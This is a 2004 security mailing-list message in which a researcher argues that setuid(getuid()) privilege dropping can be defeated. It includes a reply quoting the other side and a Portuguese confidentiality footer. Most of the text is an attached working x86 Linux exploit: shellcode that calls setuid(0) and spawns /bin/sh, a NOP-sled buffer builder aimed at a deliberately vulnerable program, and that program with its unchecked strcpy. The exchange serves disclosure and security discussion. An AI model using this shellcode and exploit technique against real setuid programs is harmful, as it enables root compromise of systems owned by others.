I attached in this mail one vuln.c program and one exploit.c to demonstrate the shellcode calls to setuid(0) and gain root privilegies...
This technique is a single demonstration about I mentionated later.
Thank you,
Rodrigo.
Pekka Savola wrote:
On Wed, 25 Feb 2004, Rodrigo Rubira Branco wrote:
Simply call to setuid(getuid()) isn't sufficient, because if an attacker discovery buffer overflow, is possibly to he insert call to setuid in your shellcode, and gain root privilegies.
Hmm.. I'm not sure if I understand what you're referrning to? Could you elaborate + provide a patch or description of the "proper" means?
It is assumed that the attacker would only be able to insert shellcode or exploit the system after the privileges have been dropped -- not before that.
Note that setuid(getuid()) is only done if the binary is setuid root. For regular binary, you'll setuid to the specific account.
-- Rodrigo Rubira Branco Seguranc,a & Infra-Estrutura Firewalls Security Corporation [EMAIL PROTECTED] Tel: 55(14) 3234-5665 Cel: 55(14) 9795-1850 Site: http://www.firewalls.com.br
Informativo de Privacidade
As informac,o~es contidas neste "email" e nos arquivos anexados sa~o para o uso
exclusivo do destinata'rio aqui indicado, e podem conter segredos comerciais, de
propriedade intelectual ou outras informac,o~es confidenciais, protegidas pelas
leis aplica'veis. Caso na~o seja o destinata'rio correto, esteja notificado, pelo
presente, que qualquer revisa~o, leitura, co'pia e/ou divulgac,a~o do conteu'do
deste "email" sa~o estritamente proibidas e na~o autorizadas. Por favor,
apague o conteu'do do "email" e notifique o remetente imediatamente.
Obrigado pela cooperac,a~o.
#include<stdio.h> #include<stdlib.h>
#define ALIGN 0
#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90
char shellcode[]=
"\x31\xc0"
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"
"\xeb\x1f"
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i<bsize;i+=4)
{
buff[i+ALIGN]=(addr&0x000000ff);
buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
buff[i]=NOP;
ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode[i];
buff[bsize-1]='\0';
printf("Jump to 0x%08x\n",addr);
execl("./vuln","vuln",buff,0);
}
#include<string.h>
#include<unistd.h>
int main(int argc,char **argv)
{
char buffer[1024];
seteuid(getuid());
if(argc>1)
strcpy(buffer,argv[1]);
}
